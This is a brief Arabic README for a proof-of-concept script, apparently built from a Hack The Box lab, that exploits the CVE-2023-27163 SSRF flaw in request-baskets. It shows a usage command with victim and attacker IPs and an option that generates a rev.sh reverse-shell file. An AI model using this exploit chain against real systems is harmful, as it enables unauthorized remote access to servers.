
إثبات المفهوم CVE-2023-27163, SSRF, request-baskets حتى v1.2.1
PoC CVE-2023-27163، SSRF، request-baskets حتى الإصدار v1.2.1
مثال الاستخدام
my_script.sh -i 10.10.11.111 -f 'localhost:80' -t 10.10.14.27
-i عنوان IP للخادم الضحية
-f عنوان IP أو اتجاه لتوجيه الاتصالات الناتجة عن SSRF
-t في هذا الخيار يتم وضع عنوان IP المحلي الخاص بك أو عنوان IP المهاجم، لتوليد ملف rev.sh، وعرض الملف.
-p إذا كنت ترغب في تعيين منفذ محدد.
تم تطوير هذا السكريبت بناءً على مختبر عملي من HTB.